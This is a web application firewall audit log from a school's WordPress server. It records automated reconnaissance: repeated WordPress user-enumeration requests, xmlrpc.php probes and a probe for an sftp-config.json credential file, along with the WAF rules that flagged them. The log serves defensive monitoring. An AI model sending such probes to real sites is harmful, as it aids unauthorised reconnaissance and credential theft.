Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e4e46a71-Z-- --1c3dae11-A-- [10/May/2025:05:20:45 +0700] aB5_vRLuBiaF9R054QBT8wAAAA8 103.236.140.4 37688 103.236.140.4 8181 --1c3dae11-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 51.255.86.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 51.255.86.12 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1c3dae11-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c3dae11-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746829245164601 2722 (- - -) Stopwatch2: 1746829245164601 2722; combined=1501, p1=442, p2=1028, p3=0, p4=0, p5=31, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c3dae11-Z-- --a0703817-A-- [10/May/2025:05:21:59 +0700] aB6AB8i6w7GTj2w44Z6YPQAAANQ 103.236.140.4 37970 103.236.140.4 8181 --a0703817-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 177.38.186.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 177.38.186.198 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a0703817-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a0703817-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746829319067041 2839 (- - -) Stopwatch2: 1746829319067041 2839; combined=1341, p1=426, p2=886, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a0703817-Z-- --87f42538-A-- [10/May/2025:05:27:28 +0700] aB6BUNr9PbfRBMhzxmRW-QAAAFY 103.236.140.4 40952 103.236.140.4 8181 --87f42538-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.88.223 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.88.223 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --87f42538-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --87f42538-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746829648767072 3233 (- - -) Stopwatch2: 1746829648767072 3233; combined=1466, p1=491, p2=943, p3=0, p4=0, p5=32, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --87f42538-Z-- --d9285c3a-A-- [10/May/2025:05:27:33 +0700] aB6BVauC4AqLGUOyzyX4igAAAJQ 103.236.140.4 41032 103.236.140.4 8181 --d9285c3a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.88.223 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.88.223 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d9285c3a-C-- demo.sayHello --d9285c3a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d9285c3a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746829653986478 5341 (- - -) Stopwatch2: 1746829653986478 5341; combined=4275, p1=513, p2=3542, p3=31, p4=36, p5=91, sr=71, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d9285c3a-Z-- --2e667920-A-- [10/May/2025:05:37:57 +0700] aB6Dxdr9PbfRBMhzxmRXowAAAEk 103.236.140.4 43384 103.236.140.4 8181 --2e667920-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 196.41.47.238 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 196.41.47.238 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2e667920-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e667920-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746830277092387 3096 (- - -) Stopwatch2: 1746830277092387 3096; combined=1447, p1=457, p2=958, p3=0, p4=0, p5=32, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e667920-Z-- --ff66206d-A-- [10/May/2025:05:58:54 +0700] aB6Irtr9PbfRBMhzxmRYwwAAAEk 103.236.140.4 49034 103.236.140.4 8181 --ff66206d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.73.65 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.73.65 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ff66206d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ff66206d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746831534418358 3462 (- - -) Stopwatch2: 1746831534418358 3462; combined=1500, p1=515, p2=949, p3=0, p4=0, p5=36, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ff66206d-Z-- --162ba441-A-- [10/May/2025:05:59:04 +0700] aB6IuNr9PbfRBMhzxmRYxQAAAEM 103.236.140.4 49038 103.236.140.4 8181 --162ba441-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.73.65 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.73.65 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --162ba441-C-- demo.sayHello --162ba441-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --162ba441-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746831544150148 6531 (- - -) Stopwatch2: 1746831544150148 6531; combined=4713, p1=587, p2=3931, p3=54, p4=34, p5=64, sr=75, sw=43, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --162ba441-Z-- --b9d9194a-A-- [10/May/2025:06:13:39 +0700] aB6MIxLuBiaF9R054QBYQwAAAAw 103.236.140.4 49184 103.236.140.4 8181 --b9d9194a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.201.11.168 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.11.168 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b9d9194a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b9d9194a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746832419371079 2235 (- - -) Stopwatch2: 1746832419371079 2235; combined=1113, p1=382, p2=704, p3=0, p4=0, p5=26, sr=121, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b9d9194a-Z-- --352bd317-A-- [10/May/2025:06:13:48 +0700] aB6MLMi6w7GTj2w44Z6aDAAAAMg 103.236.140.4 49188 103.236.140.4 8181 --352bd317-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.201.11.168 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.11.168 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --352bd317-C-- demo.sayHello --352bd317-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --352bd317-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746832428100355 4785 (- - -) Stopwatch2: 1746832428100355 4785; combined=3728, p1=451, p2=3078, p3=23, p4=26, p5=89, sr=65, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --352bd317-Z-- --ff8fcb43-A-- [10/May/2025:06:14:17 +0700] aB6MSRLuBiaF9R054QBYRQAAABE 103.236.140.4 49192 103.236.140.4 8181 --ff8fcb43-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.176.126 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.176.126 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ff8fcb43-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ff8fcb43-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746832457511112 3554 (- - -) Stopwatch2: 1746832457511112 3554; combined=1550, p1=513, p2=1006, p3=0, p4=0, p5=31, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ff8fcb43-Z-- --870a3450-A-- [10/May/2025:06:14:20 +0700] aB6MTBLuBiaF9R054QBYRwAAABM 103.236.140.4 49196 103.236.140.4 8181 --870a3450-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.176.126 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.176.126 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --870a3450-C-- demo.sayHello --870a3450-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --870a3450-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746832460793954 5562 (- - -) Stopwatch2: 1746832460793954 5562; combined=4122, p1=552, p2=3348, p3=29, p4=26, p5=97, sr=106, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --870a3450-Z-- --aa87627e-A-- [10/May/2025:06:19:50 +0700] aB6Nlsi6w7GTj2w44Z6aEwAAANc 103.236.140.4 49238 103.236.140.4 8181 --aa87627e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.63.207 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.63.207 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --aa87627e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aa87627e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746832790729045 2243 (- - -) Stopwatch2: 1746832790729045 2243; combined=1149, p1=395, p2=727, p3=0, p4=0, p5=26, sr=139, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa87627e-Z-- --17a90716-A-- [10/May/2025:06:19:55 +0700] aB6Nm6uC4AqLGUOyzyX6TAAAAIw 103.236.140.4 49244 103.236.140.4 8181 --17a90716-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.63.207 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.63.207 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --17a90716-C-- demo.sayHello --17a90716-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --17a90716-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746832795915839 5224 (- - -) Stopwatch2: 1746832795915839 5224; combined=3937, p1=515, p2=3204, p3=30, p4=27, p5=94, sr=110, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --17a90716-Z-- --ce20a12b-A-- [10/May/2025:06:20:57 +0700] aB6N2RLuBiaF9R054QBYTgAAAAI 103.236.140.4 49252 103.236.140.4 8181 --ce20a12b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.39.2 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.39.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ce20a12b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ce20a12b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746832857011231 3555 (- - -) Stopwatch2: 1746832857011231 3555; combined=1437, p1=470, p2=935, p3=0, p4=0, p5=32, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce20a12b-Z-- --5e30af62-A-- [10/May/2025:06:21:14 +0700] aB6N6si6w7GTj2w44Z6aFgAAAMM 103.236.140.4 49258 103.236.140.4 8181 --5e30af62-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.39.2 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.39.2 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5e30af62-C-- demo.sayHello --5e30af62-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5e30af62-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746832874293488 5542 (- - -) Stopwatch2: 1746832874293488 5542; combined=4167, p1=542, p2=3401, p3=26, p4=29, p5=98, sr=120, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e30af62-Z-- --d9999012-A-- [10/May/2025:06:43:06 +0700] aB6TChLuBiaF9R054QBYagAAAAw 103.236.140.4 49412 103.236.140.4 8181 --d9999012-B-- GET /sftp-config.json HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 152.42.227.246 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 152.42.227.246 X-Forwarded-Proto: https Connection: close User-Agent: python-requests/2.32.3 Accept: */* --d9999012-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d9999012-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746834186239477 950 (- - -) Stopwatch2: 1746834186239477 950; combined=401, p1=358, p2=0, p3=0, p4=0, p5=42, sr=129, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d9999012-Z-- --c62b1956-A-- [10/May/2025:06:52:58 +0700] aB6VWsi6w7GTj2w44Z6aIAAAANE 103.236.140.4 49490 103.236.140.4 8181 --c62b1956-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.179.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.179.230 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c62b1956-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c62b1956-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746834778783679 3455 (- - -) Stopwatch2: 1746834778783679 3455; combined=1472, p1=492, p2=948, p3=0, p4=0, p5=32, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
